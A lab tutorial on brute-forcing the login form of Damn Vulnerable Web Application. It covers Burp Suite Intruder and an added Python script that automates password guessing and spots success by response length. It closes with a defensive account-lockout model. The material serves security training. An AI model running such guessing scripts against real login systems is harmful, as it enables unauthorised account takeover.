How to Perform a Brute Force Attack on DVWA Using Burp Suite

Introduction

Damn Vulnerable Web Application (DVWA) is a deliberately insecure PHP/MySQL application built for practicing web attack techniques in a lab. In this tutorial we brute-force the login form in DVWA's Brute Force module (/vulnerabilities/brute/) using Burp Suite Intruder. We focus on the Low security level, which has no rate limiting, no account lockout and no anti-CSRF token, to show how a weak authentication mechanism is exploited. This guide is for educational use against your own DVWA instance only.

Prerequisites

Before starting, ensure you have:

  • A working DVWA instance on a local server (XAMPP, WAMP, Docker, etc.), with the database created and the security level set to Low under DVWA Security. GitHub: https://github.com/digininja/DVWA

  • Burp Suite Community or Professional Edition. Download: https://portswigger.net/burp

  • A basic understanding of HTTP requests and penetration-testing methodology.


Step 1: Intercept the Login Request

  1. Open Burp Suite and configure your browser to use Burp's proxy (127.0.0.1:8080 by default), or use Burp's embedded browser.

  2. Log in to DVWA with the default credentials (admin / password), confirm that DVWA Security is set to Low, and open the Brute Force module. Enter any random username and password in its login form and submit.

  3. In Burp Suite, under the Proxy > HTTP history tab, locate the request to /vulnerabilities/brute/. At the Low level the form submits via GET, so the username, password and Login parameters appear in the query string, and the request carries your PHPSESSID and security=low cookies.


Step 2: Send Request to Burp Intruder

  1. Right-click the captured request and select Send to Intruder.

  2. Open the Intruder tab and choose the Positions sub-tab.
  3. Click Clear § to remove the automatically marked positions; by default Burp marks every query parameter and cookie.

  4. Set the username parameter to a known or likely account (admin, the DVWA default), then highlight the value of the password parameter and click Add § so it becomes the only payload position. Leave the attack type as Sniper (one position, one payload set).


Step 3: Configure the Payload

  1. Go to the Payloads sub-tab in Intruder and leave the payload type as Simple list.

  2. Copy a short password wordlist, for example https://github.com/1N3/IntruderPayloads/blob/master/FuzzLists/passwords_quick.txt (any list will do), and paste it into Payload configuration.
  3. Alternatively, enter common passwords such as admin, password and 123456 by hand. A dictionary attack can only find a password that is in the dictionary, so make sure the real one (password for the default admin account) is present or the attack cannot succeed.


Step 4: Start the Attack

  1. Click Start Attack to begin brute-forcing. Burp Suite Community Edition throttles Intruder, so a long list takes noticeably longer than in Professional.

  2. Watch the Status and Length columns in the results window. Every attempt returns 200, so the status code alone does not distinguish success; the response length does.
  3. Sort by Length. Failed attempts all return the same page containing "Username and/or password incorrect.", so they share one length; the correct password returns the welcome message and a different length.


Step 5: Verify the Password

  1. Identify the entry with the unique response length and open its Response tab; it should contain "Welcome to the password protected area admin".
  2. Enter the discovered password in the Brute Force module's login form.
  3. If it is correct, the page shows the welcome message instead of the error.
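The whole procedure above, scripted so it can be repeated without clicking through Intruder. This is an added example, not code from the article or from DVWA. BASE_URL, PHPSESSID and the wordlist are placeholder assumptions you replace with your own lab values; the request shape (GET with username, password and Login, plus the PHPSESSID and security cookies) and the two marker strings are what the Low-level module actually sends and returns. The fetch parameter lets the loop run against a stub for offline checking.

```python
"""Scripted brute force of DVWA's Brute Force module at the Low level.

Added example; not part of the original article or of DVWA. BASE_URL and
PHPSESSID are placeholders for your own lab instance and session.
"""
import urllib.parse
import urllib.request
from collections import Counter

BASE_URL = "http://127.0.0.1/dvwa"        # assumption: adjust to your lab
PHPSESSID = "replace-with-your-session"   # assumption: copy it from Burp
FAIL_MARKER = "Username and/or password incorrect."
SUCCESS_MARKER = "Welcome to the password protected area"


def build_login_url(base_url, username, password):
    """Reproduce the GET request the Low-level form sends: username, password, Login."""
    query = urllib.parse.urlencode(
        {"username": username, "password": password, "Login": "Login"}
    )
    return f"{base_url}/vulnerabilities/brute/?{query}"


def request_headers(session_id):
    # The security cookie selects the module's level; without it DVWA falls
    # back to its configured default, which is not Low.
    return {"Cookie": f"PHPSESSID={session_id}; security=low"}


def classify(body):
    """Decide success or failure from the body, like Intruder's grep-match column."""
    if SUCCESS_MARKER in body:
        return "success"
    if FAIL_MARKER in body:
        return "fail"
    return "unknown"


def find_length_outliers(results):
    """Mimic sorting Intruder results by Length: the most common length is the
    failure baseline, and every other length is worth inspecting."""
    if not results:
        return []
    counts = Counter(length for _, length in results)
    baseline = counts.most_common(1)[0][0]
    return [pwd for pwd, length in results if length != baseline]


def try_password(username, password):
    """One real request against the lab; returns the response body."""
    url = build_login_url(BASE_URL, username, password)
    req = urllib.request.Request(url, headers=request_headers(PHPSESSID))
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode("utf-8", "replace")


def brute_force(username, wordlist, fetch=try_password):
    """Try each password in order. Returns (found_password_or_None, [(password, length), ...]).
    Stops at the first success, as you would stop reading Intruder results."""
    results = []
    for pwd in wordlist:
        body = fetch(username, pwd)
        results.append((pwd, len(body)))
        if classify(body) == "success":
            return pwd, results
    return None, results


if __name__ == "__main__":
    # Constructed wordlist; use a real list such as passwords_quick.txt in practice.
    words = ["123456", "admin", "letmein", "password", "qwerty"]
    found, results = brute_force("admin", words)
    print("found:", found)
    print("length outliers:", find_length_outliers(results))
```

Run it with the lab up and a valid session cookie; the outlier list should contain exactly the password whose response length differs from the failure baseline, which is the same signal you read off the Length column in Intruder.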


Conclusion

Brute-force attacks exploit weak authentication. At DVWA's Low level the Brute Force module has no protection at all: no rate limiting, no lockout and no anti-CSRF token, so every guess costs the attacker a single request. The higher levels add the countermeasures a real application should have. Medium sleeps for two seconds after each failed login, High adds an anti-CSRF token (every request needs a fresh user_token) plus a random delay, and Impossible locks the account for fifteen minutes after three failed attempts. Delays and lockouts slow the attack down; a per-request token breaks a plain Intruder run and has to be handled with a recursive grep payload or a session-handling macro.

This tutorial demonstrated how attackers use Burp Suite’s Intruder to automate password guessing. Ethical hackers and security professionals should use such knowledge to implement stronger security measures and protect their applications from brute-force attacks.
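The lockout described in the conclusion, modelled in a few lines so you can see exactly why the wordlist run above stops working. This is an added example, not DVWA's PHP and not code from the article: the threshold of three failures and the fifteen-minute window follow the text, while the in-memory store, the injectable clock and the SHA-256 storage of the demo password are assumptions made to keep the example self-contained.

```python
"""Account-lockout model in the style of DVWA's Impossible level.

Added example; not DVWA's code and not from the original article. The
threshold and window come from the tutorial text; everything else is an
assumption for illustration.
"""
import hashlib
import hmac
import time

LOCK_THRESHOLD = 3        # failed attempts before the account is locked
LOCK_SECONDS = 15 * 60    # how long the lock lasts


class LoginGuard:
    def __init__(self, users, clock=time.time):
        # users: {username: password}. Stored as SHA-256 for the example only;
        # a real application would use a slow, salted password hash.
        self._hashes = {u: hashlib.sha256(p.encode()).hexdigest() for u, p in users.items()}
        self._failures = {}   # username -> (failure count, time of last failure)
        self._clock = clock   # injectable so the lock window can be tested

    def _locked(self, user):
        count, last = self._failures.get(user, (0, 0.0))
        return count >= LOCK_THRESHOLD and self._clock() - last < LOCK_SECONDS

    def login(self, user, password):
        """Returns 'locked', 'fail' or 'success'. A locked account rejects even
        the correct password, and unknown users and wrong passwords are handled
        identically so the response reveals nothing about valid usernames."""
        if self._locked(user):
            return "locked"
        expected = self._hashes.get(user)
        given = hashlib.sha256(password.encode()).hexdigest()
        if expected is not None and hmac.compare_digest(expected, given):
            self._failures.pop(user, None)   # success clears the counter
            return "success"
        count, _ = self._failures.get(user, (0, 0.0))
        self._failures[user] = (count + 1, self._clock())
        return "fail"


def run_wordlist(guard, user, wordlist):
    """Replay the brute-force guesses against the guard and return each outcome."""
    return [guard.login(user, pwd) for pwd in wordlist]


if __name__ == "__main__":
    guard = LoginGuard({"admin": "password"})   # constructed demo account
    print(run_wordlist(guard, "admin", ["123456", "admin", "letmein", "password"]))
```

With the correct password fourth in the list, the three wrong guesses exhaust the threshold and the fourth, correct one is refused as locked. Once the window expires the attacker gets exactly one guess before a further failure re-locks the account, which turns an unthrottled dictionary run into a few guesses per quarter hour.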

